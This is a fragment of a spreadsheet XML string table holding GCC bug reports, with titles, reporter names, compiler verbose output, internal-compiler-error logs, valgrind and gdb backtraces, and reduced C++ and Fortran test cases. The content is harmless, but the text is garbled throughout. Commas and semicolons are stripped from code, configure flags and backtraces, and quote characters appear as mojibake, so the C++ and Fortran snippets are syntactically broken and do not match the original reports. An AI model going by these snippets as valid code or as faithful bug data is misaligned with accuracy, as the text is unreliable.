Also even without the reference-capture in the lambda function the code still compiles. Below follows the command used to compile the code along with one possible output.
# g++ -Wall -std=c++0x c.cpp
c.cpp: In lambda function:
c.cpp:25:4: warning: â€˜xâ€™ is used uninitialized in this function [-Wuninitialized]
# ./a.out
5
32535
32535
32535</t>
  </si>
  <si>
    <t>cheesear</t>
  </si>
  <si>
    <t>GCC-50970</t>
  </si>
  <si>
    <t>Function pointer dereferenced twice in if statement on Arm cpu</t>
  </si>
  <si>
    <t>Created attachment 25695
Test case that produces the error
We have a test case which shows that a function pointer can be dereferenced twice when it is in an if statement that evaluates to true.  This error only occurs when building for arm powerpc and x86 work as expected.  The test case is attached.
I have been able to reproduce the error with g++ 4.3.4 (CodeSourcery/Win32) 4.4.3 (Ubuntu/arm) and 4.5.2 (CodeSourcery/Win32).
root@pluto-armeem2:~# g++ -o gcc_test2 -v --save-temps test.cpp
Using built-in specs.
Target: arm-linux-gnueabi
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.4.3-4ubuntu5' --with-bugurl=file:///usr/share/doc/gcc-4.4/README.Bugs --enable-languages=cc++fortranobjcobj-c++ --prefix=/usr --enable-shared --enable-multiarch --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.4 --program-suffix=-4.4 --enable-nls --enable-clocale=gnu --enable-libstdcxx-debug --enable-plugin --enable-objc-gc --disable-sjlj-exceptions --with-arch=armv7-a --with-float=softfp --with-fpu=vfpv3-d16 --with-mode=thumb --disable-werror --enable-checking=release --build=arm-linux-gnueabi --host=arm-linux-gnueabi --target=arm-linux-gnueabi
Thread model: posix
gcc version 4.4.3 (Ubuntu 4.4.3-4ubuntu5)
COLLECT_GCC_OPTIONS='-o' 'gcc_test2' '-v' '-save-temps' '-shared-libgcc' '-march=armv7-a' '-mfloat-abi=softfp' '-mfpu=vfpv3-d16' '-mthumb'
 /usr/lib/gcc/arm-linux-gnueabi/4.4.3/cc1plus -E -quiet -v -D_GNU_SOURCE test.cpp -D_FORTIFY_SOURCE=2 -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -mthumb -fpch-preprocess -fstack-protector -o test.ii
\ignoring nonexistent directory /usr/local/include/arm-linux-gnueabi
ignoring nonexistent directory /usr/lib/gcc/arm-linux-gnueabi/4.4.3/../../../../arm-linux-gnueabi/include
ignoring nonexistent directory /usr/include/arm-linux-gnueabi
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.4
 /usr/include/c++/4.4/arm-linux-gnueabi
 /usr/include/c++/4.4/backward
 /usr/local/include
 /usr/lib/gcc/arm-linux-gnueabi/4.4.3/include
 /usr/lib/gcc/arm-linux-gnueabi/4.4.3/include-fixed
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-o' 'gcc_test2' '-v' '-save-temps' '-shared-libgcc' '-march=armv7-a' '-mfloat-abi=softfp' '-mfpu=vfpv3-d16' '-mthumb'
 /usr/lib/gcc/arm-linux-gnueabi/4.4.3/cc1plus -fpreprocessed test.ii -quiet -dumpbase test.cpp -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -mthumb -auxbase test -version -fstack-protector -o test.s
GNU C++ (Ubuntu 4.4.3-4ubuntu5) version 4.4.3 (arm-linux-gnueabi)
        compiled by GNU C version 4.4.3 GMP version 4.3.2 MPFR version 2.4.2-p1.
GGC heuristics: --param ggc-min-expand=81 --param ggc-min-heapsize=96734
GNU C++ (Ubuntu 4.4.3-4ubuntu5) version 4.4.3 (arm-linux-gnueabi)
        compiled by GNU C version 4.4.3 GMP version 4.3.2 MPFR version 2.4.2-p1.
GGC heuristics: --param ggc-min-expand=81 --param ggc-min-heapsize=96734
Compiler executable checksum: 21e593b38856b3f9b424e99bf2ade079
COLLECT_GCC_OPTIONS='-o' 'gcc_test2' '-v' '-save-temps' '-shared-libgcc' '-march=armv7-a' '-mfloat-abi=softfp' '-mfpu=vfpv3-d16' '-mthumb'
 as -march=armv7-a -mfloat-abi=softfp -mfpu=vfpv3-d16 -meabi=5 -mimplicit-it=thumb -o test.o test.s
COMPILER_PATH=/usr/lib/gcc/arm-linux-gnueabi/4.4.3/:/usr/lib/gcc/arm-linux-gnueabi/4.4.3/:/usr/lib/gcc/arm-linux-gnueabi/:/usr/lib/gcc/arm-linux-gnueabi/4.4.3/:/usr/lib/gcc/arm-linux-gnueabi/:/usr/lib/gcc/arm-linux-gnueabi/4.4.3/:/usr/lib/gcc/arm-linux-gnueabi/
LIBRARY_PATH=/usr/lib/gcc/arm-linux-gnueabi/4.4.3/:/usr/lib/gcc/arm-linux-gnueabi/4.4.3/:/usr/lib/gcc/arm-linux-gnueabi/4.4.3/../../../:/lib/:/usr/lib/
COLLECT_GCC_OPTIONS='-o' 'gcc_test2' '-v' '-save-temps' '-shared-libgcc' '-march=armv7-a' '-mfloat-abi=softfp' '-mfpu=vfpv3-d16' '-mthumb'
 /usr/lib/gcc/arm-linux-gnueabi/4.4.3/collect2 --build-id --eh-frame-hdr -dynamic-linker /lib/ld-linux.so.3 -X --hash-style=both -m armelf_linux_eabi -o gcc_test2 -z relro /usr/lib/gcc/arm-linux-gnueabi/4.4.3/../../../crt1.o /usr/lib/gcc/arm-linux-gnueabi/4.4.3/../../../crti.o /usr/lib/gcc/arm-linux-gnueabi/4.4.3/crtbegin.o -L/usr/lib/gcc/arm-linux-gnueabi/4.4.3 -L/usr/lib/gcc/arm-linux-gnueabi/4.4.3 -L/usr/lib/gcc/arm-linux-gnueabi/4.4.3/../../.. test.o -lstdc++ -lm -lgcc_s -lgcc -lc -lgcc_s -lgcc /usr/lib/gcc/arm-linux-gnueabi/4.4.3/crtend.o /usr/lib/gcc/arm-linux-gnueabi/4.4.3/../../../crtn.o</t>
  </si>
  <si>
    <t>emillbrandt</t>
  </si>
  <si>
    <t>GCC-37243</t>
  </si>
  <si>
    <t>[4.4 Regression] IRA causes wrong code generation</t>
  </si>
  <si>
    <t>+FAIL: 21_strings/basic_string/numeric_conversions/char/stoi.cc execution test
+FAIL: 21_strings/basic_string/numeric_conversions/char/stol.cc execution test
+FAIL: 21_strings/basic_string/numeric_conversions/char/stoul.cc execution test
On Linux/x86-64 revision 139590 caused the following regressions:
+FAIL: g++.old-deja/g++.eh/ia64-1.C execution test
+FAIL: g++.old-deja/g++.eh/rethrow6.C execution test
+FAIL: gcc.target/i386/pr34256.c scan-assembler-times mov 2
+FAIL: gcc.target/i386/pr36222-1.c scan-assembler-not movdqa
+FAIL: gcc.target/i386/pr36222-1.c scan-assembler-not movdqa
+FAIL: gcc.target/i386/pr36246.c scan-assembler-not movq
+FAIL: libgomp.fortran/vla7.f90  -O3 -fomit-frame-pointer  execution test
+FAIL: libgomp.fortran/vla7.f90  -O3 -fomit-frame-pointer -funroll-all-loops -finline-functions  execution test
+FAIL: libgomp.fortran/vla7.f90  -O3 -fomit-frame-pointer -funroll-loops  execution test
with
# make check RUNTESTFLAGS=--target_board 'unix{-m32}'</t>
  </si>
  <si>
    <t>GCC-8037</t>
  </si>
  <si>
    <t>GCC crashes on compiling compute.c</t>
  </si>
  <si>
    <t>When trying to make make install as root for KDE addons 3.07 it fails with:
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
cc1: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
Release:
3.2
Environment:
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
How-To-Repeat:
null:/home/te/src/kde-3.1-beta/kdeaddons-3.0.7 # cd noatun-plugins/tyler/
null:/home/te/src/kde-3.1-beta/kdeaddons-3.0.7/noatun-plugins/tyler # gcc -v -save-temps -DHAVE_CONFIG_H -I. -I. -I../.. -I/usr/local/kde/include -I/usr/local/qt/include -I/usr/X11R6/include  -I/usr/local/include -I/usr/local/include/SDL -D_REENTRANT  -DQT_THREAD_SUPPORT  -D_REENTRANT  -ansi -W -Wall -pedantic -Wshadow -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -D_XOPEN_SOURCE=500 -D_BSD_SOURCE -O2   -c `test -f compute.c || echo './'`compute.c
Reading specs from /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/specs
Configured with: ./configure
Thread model: posix
gcc version 3.2
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/cpp0 -lang-c -std=c89 -v -I. -I. -I../.. -I/usr/local/kde/include -I/usr/local/qt/include -I/usr/X11R6/include -I/usr/local/include -I/usr/local/include/SDL -iprefix /usr/bin/../lib/gcc-lib/i686-pc-linux-gnu/3.2/ -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -D__i386 -D__i386__ -D__tune_i686__ -D__tune_pentiumpro__ -DHAVE_CONFIG_H -D_REENTRANT -DQT_THREAD_SUPPORT -D_REENTRANT -D_XOPEN_SOURCE=500 -D_BSD_SOURCE compute.c -W -Wall -Wshadow -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -pedantic compute.i
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
ignoring nonexistent directory /usr/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
ignoring nonexistent directory /usr/lib/gcc-lib/i686-pc-linux-gnu/3.2/../../../../i686-pc-linux-gnu/include
ignoring nonexistent directory NONE/include
ignoring nonexistent directory /usr/local/i686-pc-linux-gnu/include
ignoring duplicate directory .
cpp0: warning: changing search order for system directory /usr/local/include
cpp0: warning:   as it has already been specified as a non-system directory
ignoring duplicate directory /usr/local/include
#include ... search starts here:
#include  search starts here:
 .
 ../..
 /usr/local/kde/include
 /usr/local/qt/include
 /usr/X11R6/include
 /usr/local/include
 /usr/local/include/SDL
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/include
 /usr/include
End of search list.
 /usr/local/lib/gcc-lib/i686-pc-linux-gnu/3.2/cc1 -fpreprocessed compute.i -quiet -dumpbase compute.c -ansi -O2 -W -Wall -Wshadow -Wpointer-arith -Wmissing-prototypes -Wwrite-strings -pedantic -ansi -version -o compute.s
GNU CPP version 3.2 (cpplib) (i386 Linux/ELF)
cc1: internal error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
null:/home/te/src/kde-3.1-beta/kdeaddons-3.0.7/noatun-plugins/tyler #</t>
  </si>
  <si>
    <t>perl_dummy</t>
  </si>
  <si>
    <t>GCC-23638</t>
  </si>
  <si>
    <t>Print format generates compiler segmentation fault</t>
  </si>
  <si>
    <t>The following code produces the error message:
  internal compiler error: Segmentation fault
  Please submit a full bug report
      PROGRAM main
c
c  Simplified extract from legacy code which generated format
c     statements
c
c  Compiled with gfortran 4.0.1:
c     Using built-in specs.
c     Target: i586-pc-linux-gnu
c     Configured with: ../gcc-4.0.1/configure --program-suffix=4
c     --with-gnu-as --with-gnu-ld
c     --enable-version-specific-runtime-libs --with-cpu=k6
c     Thread model: posix
c     gcc version 4.0.1
c
c
c  - I presume it should work using array element 1 or give 
c    a sensible error report
c    PRINT AOUT(1) ...  compiles and runs OK
c
      CHARACTER*8 AOUT(2)
c
      DATA AOUT(1)AOUT(2)/(6X4I5)(4I7)/
c
      PRINT AOUT1234
c
      STOP
      END
This may be related to Known Causes of Trouble with GNU Fortran-&gt;Missing
Features-&gt;Invalid FORMAT Specifiers.  Usually the latter is a run time
problem this is a complete compiler failure with no error message about the cause.
Additional Information
======================
Output from 'f77 -v -save-temps debug.F':  (f77 is my link)
f77 -v -save-temps debug.F
Driving: f77 -v -save-temps debug.F -lgfortranbegin -lgfortran -lm -shared-libgcc
Using built-in specs.
Target: i586-pc-linux-gnu
Configured with: ../gcc-4.0.1/configure --program-suffix=4 --with-gnu-as
--with-gnu-ld --enable-version-specific-runtime-libs --with-cpu=k6
Thread model: posix
gcc version 4.0.1
 /usr/local/libexec/gcc/i586-pc-linux-gnu/4.0.1/cc1 -E -traditional-cpp
-D_LANGUAGE_FORTRAN -quiet -v debug.F -mtune=k6 -fpch-preprocess -o debug.f
ignoring nonexistent directory NONE/include
ignoring nonexistent directory
/usr/local/lib/gcc/i586-pc-linux-gnu/4.0.1/../../../../i586-pc-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/local/lib/gcc/i586-pc-linux-gnu/4.0.1/include
 /usr/include
End of search list.
 /usr/local/libexec/gcc/i586-pc-linux-gnu/4.0.1/f951 debug.f -ffixed-form -quiet
-dumpbase debug.F -mtune=k6 -auxbase debug -version -o debug.s
GNU F95 version 4.0.1 (i586-pc-linux-gnu)
        compiled by GNU C version 4.0.1.
GGC heuristics: --param ggc-min-expand=55 --param ggc-min-heapsize=48298
debug.F: In function â€˜MAIN__â€™:
debug.F:23: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Contents of debug.s
        .file   debug.f
Contents of debug.f
# 1 debug.F
# 1 
# 1 
# 1 debug.F
      PROGRAM main
c
c  Simplified extract from legacy code which generated format
c     statements
c
c  Compiled with gfortran 4.0.1:
c     Using built-in specs.
c     Target: i586-pc-1-gnu
c     Configured with: ../gcc-4.0.1/configure --program-suffix=4
c     --with-gnu-as --with-gnu-ld
c     --enable-version-specific-runtime-libs --with-cpu=k6
c     Thread model: posix
c     gcc version 4.0.1
c
c
c  - I presume it should work or give a sensible error report
c  PRINT AOUT(1) ...  compiles and runs OK
c
      CHARACTER*8 AOUT(2)
c
      DATA AOUT(1)AOUT(2)/(6X4I5)(4I7)/
c
      PRINT AOUT1234
c
      STOP
      END</t>
  </si>
  <si>
    <t>djw</t>
  </si>
  <si>
    <t>GCC-46924</t>
  </si>
  <si>
    <t>[4.6 Regression] ICE: SIGSEGV in rewrite_commutative_reductions_out_of_ssa_loop (graphite-poly.h:450) with -fgraphite-identity -ffast-math -fno-tree-loop-im</t>
  </si>
  <si>
    <t>Created attachment 22744
reduced testcase (from gcc.dg/graphite/id-14.c)
Compiler output:
$ gcc -O -fgraphite-identity -ffast-math -fno-tree-loop-im pr46924.c
==29600== Invalid read of size 8
==29600==    at 0xFDCB06: rewrite_commutative_reductions_out_of_ssa_loop (graphite-poly.h:450)
==29600==    by 0xFE3F1E: build_poly_scop (graphite-sese-to-poly.c:3068)
==29600==    by 0xFCB4F4: graphite_transform_loops (graphite.c:282)
==29600==    by 0x9B20C6: graphite_transforms (tree-ssa-loop.c:296)
==29600==    by 0x7EC65E: execute_one_pass (passes.c:1553)
==29600==    by 0x7EC924: execute_pass_list (passes.c:1608)
==29600==    by 0x7EC936: execute_pass_list (passes.c:1609)
==29600==    by 0x7EC936: execute_pass_list (passes.c:1609)
==29600==    by 0x7EC936: execute_pass_list (passes.c:1609)
==29600==    by 0x92CEF5: tree_rest_of_compilation (tree-optimize.c:422)
==29600==    by 0xAF2721: cgraph_expand_function (cgraphunit.c:1508)
==29600==    by 0xAF4CF9: cgraph_optimize (cgraphunit.c:1567)
==29600==  Address 0x8 is not stack'd malloc'd or (recently) free'd
==29600== 
pr46924.c: In function 'foo':
pr46924.c:7:7: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
GDB backtrace:
split_reduction_stmt (scop=0x17c36f0 loop=)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:2644
2644      poly_bb_p pbb = pbb_from_bb (bb)
(gdb) bt
#0  split_reduction_stmt (scop=0x17c36f0 loop=)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:2644
#1  translate_scalar_reduction_to_array (scop=0x17c36f0 loop=)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:2984
#2  rewrite_commutative_reductions_out_of_ssa_close_phi (scop=0x17c36f0 loop=)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:3024
#3  rewrite_commutative_reductions_out_of_ssa_loop (scop=0x17c36f0 loop=)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:3051
#4  0x0000000000fe3f1f in rewrite_commutative_reductions_out_of_ssa (scop=0x17c36f0)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:3068
#5  build_poly_scop (scop=0x17c36f0) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite-sese-to-poly.c:3155
#6  0x0000000000fcb4f5 in graphite_transform_loops () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/graphite.c:282
#7  0x00000000009b20c7 in graphite_transforms () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/tree-ssa-loop.c:296
#8  0x00000000007ec65f in execute_one_pass (pass=0x16368a0) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1553
#9  0x00000000007ec925 in execute_pass_list (pass=0x16368a0) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1608
#10 0x00000000007ec937 in execute_pass_list (pass=0x1636900) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1609
#11 0x00000000007ec937 in execute_pass_list (pass=0x1636ba0) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1609
#12 0x00000000007ec937 in execute_pass_list (pass=0x1635d60) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/passes.c:1609
#13 0x000000000092cef6 in tree_rest_of_compilation (fndecl=0x7ffff5cc4f00)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/tree-optimize.c:422
#14 0x0000000000af2722 in cgraph_expand_function (node=0x7ffff5ce4000)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1508
#15 0x0000000000af4cfa in cgraph_expand_all_functions () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1567
#16 cgraph_optimize () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1827
#17 0x0000000000af527a in cgraph_finalize_compilation_unit ()
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/cgraphunit.c:1031
#18 0x0000000000508cdc in c_write_global_declarations () at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/c-decl.c:9845
#19 0x00000000008d6776 in compile_file (argc=16 argv=0x7fffffffda98)
    at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/toplev.c:591
#20 do_compile (argc=16 argv=0x7fffffffda98) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/toplev.c:1874
#21 toplev_main (argc=16 argv=0x7fffffffda98) at /usr/portage/distfiles/svn-src/gcc/trunk/gcc/toplev.c:1937
#22 0x00007ffff6586bbd in __libc_start_main () from /lib/libc.so.6
#23 0x00000000004ef6b9 in _start ()
Tested revisions:
r167723 - crash
r167585 - crash
r165699 - OK
4.5 r166509 - OK</t>
  </si>
  <si>
    <t>GCC-57090</t>
  </si>
  <si>
    <t>[Fortran-Dev] FAIL: gfortran.dg/alloc_comp_bounds_1.f90  -O*  execution test</t>
  </si>
  <si>
    <t>The test gfortran.dg/alloc_comp_bounds_1.f90 fails when compile with the fortran-dev branch. Reduced test:
  integer parameter :: ik4 = 4
  integer parameter :: ik8 = 8
  integer parameter :: from = -1 to = 2
  call foo
  call bar
contains
  subroutine foo
    type :: struct
      integer(4) allocatable :: ib(:)
    end type struct
    integer(ik4) allocatable :: ia(:)
    type(struct) :: x
    allocate(ia(from:to))
    x=struct(ia(:))
    print * lbound(x%ib) ubound(x%ib)   expected  1 4
!    if (any(lbound(x%ib) .ne. 1) .or. any(ubound(x%ib) .ne. 4)) call abort
    deallocate(ia)
  end subroutine
  subroutine bar
    type :: struct
      integer(4) allocatable :: ib(:)
    end type struct
    integer(ik8) allocatable :: ia(:)
    type(struct) :: x
    allocate(ia(from:to))
    x=struct(ia)
    print * lbound(x%ib) ubound(x%ib)   expected -1 2
!    if (any(lbound(x%ib) .ne. -1) .or. any(ubound(x%ib) .ne. 2)) call abort
    x=struct(ia(:))
    print * lbound(x%ib) ubound(x%ib)   expected  1 4
!    if (any(lbound(x%ib) .ne. 1) .or. any(ubound(x%ib) .ne. 4)) call abort
    x=struct(ia(from:to))
    print * lbound(x%ib) ubound(x%ib)   expected  1 4
!    if (any(lbound(x%ib) .ne. 1) .or. any(ubound(x%ib) .ne. 4)) call abort
    deallocate(ia)
  end subroutine
end
output
           1           6   expected  1 4
          -1           1   expected -1 2
           1           5   expected  1 4
           1           5   expected  1 4</t>
  </si>
  <si>
    <t>GCC-19326</t>
  </si>
  <si>
    <t>[4.0 Regression] gcc.c-torture/execute/simd-6.c fails on x86-64</t>
  </si>
  <si>
    <t>These tests started recently failing: 
   gcc.c-torture/execute/simd-6.c compilation  -O3 -fomit-frame-pointer 
   gcc.c-torture/execute/simd-6.c compilation  -O3 -g 
   gcc.c-torture/execute/simd-6.c compilation  -Os 
Note the tests work fine with -m32 - and also with the other compile options 
just these three fail. 
Executing on host: /builds/gcc/misc/gcc/xgcc 
-B/builds/gcc/misc/gcc/ /cvs/gcc/gcc/testsuite/gcc.c-torture/execute/simd-6.c  
-w  -O3 -fomit-frame-pointer   -lm -o /builds/gcc/misc/gcc/testsuite/simd-6.x3    
(timeout = 300) 
/cvs/gcc/gcc/testsuite/gcc.c-torture/execute/simd-6.c: In function 'main': 
/cvs/gcc/gcc/testsuite/gcc.c-torture/execute/simd-6.c:22: error: unable to find 
a register to spill in class 'GENERAL_REGS' 
/cvs/gcc/gcc/testsuite/gcc.c-torture/execute/simd-6.c:22: error: this is the 
insn: 
(insn:HI 82 80 84 0 (set (strict_low_part (subreg:QI (reg:V8QI 21 xmm0 [128]) 
0)) 
        (const_int 3 [0x3])) 60 {*movstrictqi_1} (insn_list:REG_DEP_TRUE 80 
(nil)) 
    (nil)) 
/cvs/gcc/gcc/testsuite/gcc.c-torture/execute/simd-6.c:22: internal compiler 
error: in spill_failure at reload1.c:1873 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
compiler exited with status 1</t>
  </si>
  <si>
    <t>GCC-50493</t>
  </si>
  <si>
    <t>ICE in neon_disambiguate_copy at config/arm/arm.c:20388</t>
  </si>
  <si>
    <t>Created attachment 25347
preprocessed source
$ ./xgcc -v
Using built-in specs.
COLLECT_GCC=./xgcc
Target: arm-unknown-linux-gnueabi
Configured with: ../configure --target=arm-unknown-linux-gnueabi --prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi --with-sysroot=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi//sys-root --disable-multilib --with-local-prefix=/home/ryan/x-tools/arm-unknown-linux-gnueabi/arm-unknown-linux-gnueabi/sys-root --disable-nls --enable-threads=posix --enable-symvers=gnu --enable-c99 --enable-long-long --enable-target-optspace target_alias=arm-unknown-linux-gnueabi --enable-languages=c++ --disable-shared --disable-libmudflap --disable-libssp
Thread model: posix
gcc version 4.7.0 20110923 (experimental) [trunk revision 179117] (GCC) 
$ ./xgcc -B. -O3 -mfpu=neon -mfloat-abi=softfp ~/ice.i -fpic
/home/ryan/ice.i: In function 'SetupUSEVertexShader':
/home/ryan/ice.i:342:38: warning: incompatible implicit declaration of built-in function 'calloc' [enabled by default]
/home/ryan/ice.i:353:1: internal compiler error: in neon_disambiguate_copy at config/arm/arm.c:20388
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-9176</t>
  </si>
  <si>
    <t>[i386] strange things in i386.h</t>
  </si>
  <si>
    <t>Looking at i386.h source code I found tho things which are maybe not correct:
march=march=pentium2
mmx|msse
In my opinion correct should be:
march=pentium2
mmmx|msse
Release:
3.2.1
Environment:
System: Linux utx 2.4.20-pre10 #14 Ne lis 24 17:43:28 CET 2002 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ./configure --prefix=/usr --bindir=/usr/bin --sbindir=/usr/sbin --libexecdir=/usr/lib --datadir=/usr/share --sysconfdir=/etc --sharedstatedir=/var/cache --localstatedir=/var --libdir=/usr/lib --includedir=/usr/include --oldincludedir=/usr/include --infodir=/usr/share/info --mandir=/usr/share/man --enable-shared --disable-static --with-pic --with-system-zlib --verbose</t>
  </si>
  <si>
    <t>utx</t>
  </si>
  <si>
    <t>GCC-2447</t>
  </si>
  <si>
    <t>g++ don't handle execption when using with -fomit-frame-pointer</t>
  </si>
  <si>
    <t>When compiling the attached code with fomi-frame-pointer it does segfault when it should catch the error :
[t.cc is the example file]
[gc@bi ~/tmp] g++ t.cc
[gc@bi ~/tmp] ./a.out 
step #1
step #2
step #3
catched!
[gc@bi ~/tmp] g++ -fomit-frame-pointer t.cc
[gc@bi ~/tmp] ./a.out 
step #1
step #2
step #3
Aborted (core dumped)
[gc@bi ~/tmp]
Release:
3.1 20010331
Environment:
i686-pc-linux</t>
  </si>
  <si>
    <t>chmouel</t>
  </si>
  <si>
    <t>GCC-10230</t>
  </si>
  <si>
    <t>[3.4 regression] type `A::B' is not a base type for type `C'</t>
  </si>
  <si>
    <t>class A {
public:
  class B {
  public:
    int a
  }
}
class C {
public:
  void f(void) { sizeof(A::B::a) }
}
-----------------------------
g++ -v -o o o.cc -Wall
Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/3.2/specs
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --host=i386-redhat-linux --with-system-zlib --enable-__cxa_atexit
Thread model: posix
gcc version 3.2 20020903 (Red Hat Linux 8.0 3.2-7)
 /usr/lib/gcc-lib/i386-redhat-linux/3.2/cc1plus -v -D__GNUC__=3 -D__GNUC_MINOR__=2 -D__GNUC_PATCHLEVEL__=0 -D__GXX_ABI_VERSION=102 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__NO_INLINE__ -D__STDC_HOSTED__=1 -D_GNU_SOURCE -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ o.cc -D__GNUG__=3 -D__DEPRECATED -D__EXCEPTIONS -quiet -dumpbase o.cc -Wall -version -o /tmp/cchUfooG.s
GNU CPP version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) (cpplib) (i386 Linux/ELF)
GNU C++ version 3.2 20020903 (Red Hat Linux 8.0 3.2-7) (i386-redhat-linux)
	compiled by GNU C version 3.2 20020903 (Red Hat Linux 8.0 3.2-7).
ignoring nonexistent directory /usr/i386-redhat-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/3.2
 /usr/include/c++/3.2/i386-redhat-linux
 /usr/include/c++/3.2/backward
 /usr/local/include
 /usr/lib/gcc-lib/i386-redhat-linux/3.2/include
 /usr/include
End of search list.
o.cc: In member function `void C::f()':
o.cc:11: type `A::B' is not a base type for type `C'
Compilation exited abnormally with code 1 at Thu Mar 27 07:50:25
Release:
g++ 3.2</t>
  </si>
  <si>
    <t>pepeaty</t>
  </si>
  <si>
    <t>GCC-24954</t>
  </si>
  <si>
    <t>[4.1/4.2 Regression] ICE: could not split insn</t>
  </si>
  <si>
    <t>Running the GCC testsuite I get the following ICE:
Executing on host: /abuild/aj/gcc/gcc/xgcc -B/abuild/aj/gcc/gcc/ /aj-cvs/gcc-svn/branches/gcc-4_1-branch/gcc/testsuite/gcc.target/powerpc/altivec-const
s.c   -maltivec -mabi=altivec -O2 -fno-show-column  -lm   -m64 -o ./altivec-consts.exe    (timeout = 300)
/aj-cvs/gcc-svn/branches/gcc-4_1-branch/gcc/testsuite/gcc.target/powerpc/altivec-consts.c: In function 'v4si_vspltisw_neg_addself':
/aj-cvs/gcc-svn/branches/gcc-4_1-branch/gcc/testsuite/gcc.target/powerpc/altivec-consts.c:280: error: could not split insn
(insn 17 18 19 (set (reg:V4SI 79 2)
        (const_vector:V4SI [
                (const_int -24 [0xffffffffffffffe8])
                (const_int -24 [0xffffffffffffffe8])
                (const_int -24 [0xffffffffffffffe8])
                (const_int -24 [0xffffffffffffffe8])
            ])) 603 {*movv4si_internal} (insn_list:REG_DEP_OUTPUT 12 (insn_list:REG_DEP_OUTPUT 35 (nil)))
    (expr_list:REG_EQUAL (const_vector:V4SI [
                (const_int -24 [0xffffffffffffffe8])
                (const_int -24 [0xffffffffffffffe8])
                (const_int -24 [0xffffffffffffffe8])
                (const_int -24 [0xffffffffffffffe8])
            ])
        (nil)))
/aj-cvs/gcc-svn/branches/gcc-4_1-branch/gcc/testsuite/gcc.target/powerpc/altivec-consts.c:280: internal compiler error: in final_scan_insn at final.c:
2467
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
[...]
FAIL: gcc.target/powerpc/altivec-consts.c (test for excess errors)
Compiler used is:
/opt/gcc/4.1-devel/bin/gcc -v
Using built-in specs.
Target: powerpc64-suse-linux-gnu
Configured with: /aj-cvs/gcc-svn/branches/gcc-4_1-branch/configure --prefix=/opt/gcc/4.1-devel --enable-checking=misctreegcrtlrtlflagassert --enable-threads=posix --enable-clocale=gnu --enable-__cxa_atexit --enable-shared --enable-languages=cc++treelangjavaf95objc --with-system-zlib --with-cpu=default32 powerpc64-suse-linux-gnu
Thread model: posix
gcc version 4.1.0 20051119 (prerelease)</t>
  </si>
  <si>
    <t>GCC-29129</t>
  </si>
  <si>
    <t>[4.2/4.3/4.4 Regression] [DR#341] unnamed parameters using [*]</t>
  </si>
  <si>
    <t>Compile the following with -std=c99 -pedantic-errors
void f(unsigned int [*])
